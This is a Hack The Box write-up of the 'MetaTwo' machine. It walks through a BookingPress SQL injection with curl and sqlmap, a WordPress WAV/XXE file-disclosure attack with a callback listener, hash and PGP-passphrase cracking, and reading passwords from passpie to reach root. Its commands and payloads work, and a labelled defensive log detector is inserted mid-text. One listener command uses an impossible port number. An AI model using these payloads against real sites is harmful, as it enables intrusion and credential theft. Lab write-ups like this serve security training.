MetaTwo — HTB [Easy]

Aks
8 min read · Apr 27, 2023

STEP 1 — Information Gathering & Enumeration

nmap -T4 -sC -sV  -p- 10.10.11.186 -oX htbMeta.xml

=> discover open ports: 21, 22, 80

=> then a second scan against port 80 only:

nmap -T4 -sC -sV 10.10.11.186 -p80

=> the scan discloses WordPress version 5.6.2

Then I try to access port 80; to do that I first need to add the IP address to /etc/hosts.

After that I can access the website on port 80; the UI looks like the screenshot below:

Next I brute-force hidden directories on the target using gobuster:

gobuster dir -u http://metapress.htb -w /usr/share/wordlists/dirb/common.txt -x pdf,png,jpg,txt,php 

=> several paths return status 200: /.htaccess, /license.txt, /robots.txt, /wp-config.php, /wp-cron.php, /wp-links-opml.php, /wp-load.php and /wp-login.php.

STEP 2 — Vulnerability Identification & Analysis

For this phase I first use searchsploit to see which known vulnerabilities affect WordPress 5.6.2:

searchsploit wordpress 5.6.2

=> it lists several vulnerabilities in WordPress plugins, so I open /wp-login.php and inspect the page source for any outdated plugins.

As the screenshot above shows, the page loads a plugin called bookingpress with ver=1.0.10. After some searching I found that this version is affected by CVE-2022-0739:

- https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
- https://github.com/destr4ct/CVE-2022-0739
- https://patchstack.com/database/vulnerability/bookingpress-appointment-booking/wordpress-bookingpress-plugin-1-0-10-unauthenticated-sql-injection-sqli-vulnerability

To exploit the target we first take the _wpnonce value from the page source:

=> _wpnonce: 0dbd7f3b66

STEP 3 — Exploitation

Send the request with curl through Burp Suite (the -x option points at the proxy) so the request is captured:

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=0dbd7f3b66&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -' -x http://127.0.0.1:8080

Copy the captured request to a file named admin.req (or any name you like) and edit it so it looks like this:

Run sqlmap against the request file:

sqlmap -r admin.req -p total_service --batch

=> sqlmap confirms that total_service is injectable and identifies the backend database

Run sqlmap again to enumerate the databases:

sqlmap -r admin.req -p total_service --dbs 

=> two databases are found: 'blog' and 'information_schema'

Another sqlmap run lists the tables of the blog database:

sqlmap -r admin.req -p total_service -D blog --tables

=> the tables in 'blog' are listed

Next, dump the wp_users table:

sqlmap -r admin.req -p total_service -D blog -T wp_users --dump

=> the columns user_login, user_email and user_pass give us credentials.
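As an added example (not from this write-up or the BookingPress project), here is a small Python check a defender could run over proxy or WAF audit records to detect the request above; it assumes request method, URL and form body are available, since a default access log does not record POST bodies.

```python
import re
from urllib.parse import parse_qs, urlparse

TARGET_ACTION = "bookingpress_front_get_category_services"
INT_PARAMS = ("category_id", "total_service")  # the plugin expects integers here
INTEGER = re.compile(r"-?\d+")
SQL_HINT = re.compile(r"\b(union|select|sleep|benchmark)\b|@@|--", re.I)

def classify_request(method, url, body=""):
    """Return None for benign traffic, otherwise a dict describing the finding."""
    parsed = urlparse(url)
    if not parsed.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # POST parameters live in the body, GET parameters in the query string
    raw = body if method.upper() == "POST" else parsed.query
    params = parse_qs(raw, keep_blank_values=True)
    if params.get("action", [""])[0] != TARGET_ACTION:
        return None
    reasons = []
    for name in INT_PARAMS:
        for value in params.get(name, []):
            if not INTEGER.fullmatch(value.strip()):
                reasons.append(f"{name} is not an integer: {value[:40]!r}")
            if SQL_HINT.search(value):
                reasons.append(f"{name} contains SQL syntax")
    if not reasons:
        return None
    return {"severity": "high", "cve": "CVE-2022-0739", "reasons": reasons}

def scan(records):
    findings = []
    for index, (method, url, body) in enumerate(records):
        hit = classify_request(method, url, body)
        if hit:
            findings.append({"record": index, **hit})
    return findings

# Constructed sample records: the first is the injection request from this
# write-up, the others are what normal plugin and WordPress traffic look like.
SAMPLE_RECORDS = [
    ("POST", "/wp-admin/admin-ajax.php",
     "action=bookingpress_front_get_category_services&_wpnonce=0dbd7f3b66"
     "&category_id=33&total_service=-7502) UNION ALL SELECT @@version,"
     "@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -"),
    ("POST", "/wp-admin/admin-ajax.php",
     "action=bookingpress_front_get_category_services&_wpnonce=0dbd7f3b66"
     "&category_id=33&total_service=4"),
    ("POST", "/wp-admin/admin-ajax.php", "action=heartbeat&interval=60"),
]
```

The non-integer check alone catches the request even if the SQL keywords are obfuscated, which is why it runs before the keyword hint.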

The user_pass values are hashed, so to recover the plaintext we crack them with John the Ripper:

john MetaPassHash --wordlist=/usr/share/wordlists/rockyou.txt

I then try the recovered credentials against FTP on port 21, but the login fails.

Trying the same credentials on /wp-login.php works, and we are logged in to WordPress.

Inside WordPress there is a 'Media' feature that lets us upload files such as .WAV; this matches another CVE, CVE-2021-29447, where a crafted WAV file makes the server connect back to us.

CVE-2021-29447: an authenticated user with low privileges can upload a malicious WAV file, which can lead to remote arbitrary file disclosure and server-side request forgery (SSRF).

Create the WAV file and a DTD file called dedsec.dtd (or any name you like).

Start a PHP server to listen for the callback, then upload the WAV file through Media:

=> php -S 0.0.0.0:90001
=> upload payload.wav

=> a connection comes back from the target, delivering the file contents base64-encoded

=> decode the value: echo -n 'base64 value' | base64 -d

=> modify dedsec.dtd to target the nginx configuration

=> decode the returned base64 value the same way: echo -n 'base64 value' | base64 -d

=> the web root is /var/www/metapress.htb/blog

=> modify dedsec.dtd again and point it at /var/www/metapress.htb/blog

=> decode the returned base64 value the same way: echo -n 'base64 value' | base64 -d

=> this yields FTP credentials:

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

=> connect to FTP with these credentials (login succeeds):
— ftp 10.10.11.186
— Name: metapress.htb
— Password: 9NYS_ii@FyL_p5M2NvJ

In the directory 'mailer' there is an interesting file called send_email.php.

cat send_email.php reveals more credentials:

$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
$mail->SMTPSecure = "tls";
$mail->Port = 587;

$mail->From = "jnelson@metapress.htb";
$mail->FromName = "James Nelson";

$mail->addAddress("info@metapress.htb");

=> With those credentials I log in over SSH (login succeeds):
— Username: jnelson
— Password: Cb4_JmWM8zUZWMu@Ys
— Got user.txt

STEP 4 — Privilege Escalation

=> ls -la shows an unusual directory called 'passpie'

Passpie is a command line tool to manage passwords from the terminal with a colorful and configurable interface. Use a master passphrase to decrypt login credentials, copy passwords to clipboard, synchronize with a git repository, check the state of your passwords, and more.

Using passpie search and passpie config lists some information; the command find . -wholename "*ssh/root*" finds ./.passpie/ssh/root.pass.

Then read it with cat ./.passpie/ssh/root.pass.

  • transfer the keys to our machine: scp jnelson@10.10.11.186:.passpie/.keys .keys
  • cat .keys shows a public and a private PGP key
  • alternatively, copy the file by absolute path: scp jnelson@10.10.11.186:/home/jnelson/.keys /home/aks28/
  • to locate the keys on the target: find -name "*.keys*"
    ./.local/share/keyrings/user.keystore
    ./.keys
    then cat ./.keys

Delete the public key from the file, then convert the private key to John format: gpg2john ./.keys > PGPprivateKey.john

Crack the private key's passphrase with John the Ripper: john PGPprivateKey.john --wordlist=/usr/share/wordlists/rockyou.txt

=> John recovers the passphrase: blink182 (Passpie)

With the passpie passphrase we can export the stored passwords:

=> touch pass
=> passpie export pass
=> password: blink182
=> cat pass:
- comment: ''
  fullname: root@ssh
  login: root
  modified: 2022-06-26 08:58:15.621572
  name: ssh
  password: !!python/unicode 'p7qfAZt4_A1xo_0x'

- comment: ''
  fullname: jnelson@ssh
  login: jnelson
  modified: 2022-06-26 08:58:15.514422
  name: ssh
  password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'

handler: passpie
version: 1.0

  • Now we can get root:

=> su root
=> password: p7qfAZt4_A1xo_0x
=> read the flag: cat /root/root.txt gives 1ce965673e694464252b209227a4cccf
